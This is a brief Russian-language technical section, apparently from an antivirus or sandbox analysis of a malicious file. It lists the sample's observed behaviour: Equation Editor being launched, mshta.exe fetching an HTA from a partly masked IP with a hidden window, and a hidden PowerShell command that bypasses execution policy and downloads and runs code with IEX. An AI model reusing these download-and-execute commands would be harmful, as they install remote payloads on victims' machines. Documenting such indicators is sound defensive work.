Техническая информация
- '%WINDIR%\syswow64\mshta.exe' http://45.##.139.186:8080/hta &AAAAAAAC
- http://45.##.139.186:8080/hta via 45.##.139.186
- http://45.##.139.186:8080/_Incapsula_Resource?SW############################## via 45.##.139.186
- http://45.##.139.186:8080/_Incapsula_Resource?SW############################### via 45.##.139.186
- http://45.##.139.186:8080/_Incapsula_Resource?SW############################# via 45.##.139.186
- http://45.##.139.186:8080/get via 45.##.139.186
- '%WINDIR%\syswow64\mshta.exe' http://45.##.139.186:8080/hta &AAAAAAAC' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[<#000#>Net.WebRequest<#000#>]::GetSystemWebProxy();$V.Proxy.Credentials=[<#000#>Net.CredentialCache<#000#>]::DefaultCredentials;IEX($V...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding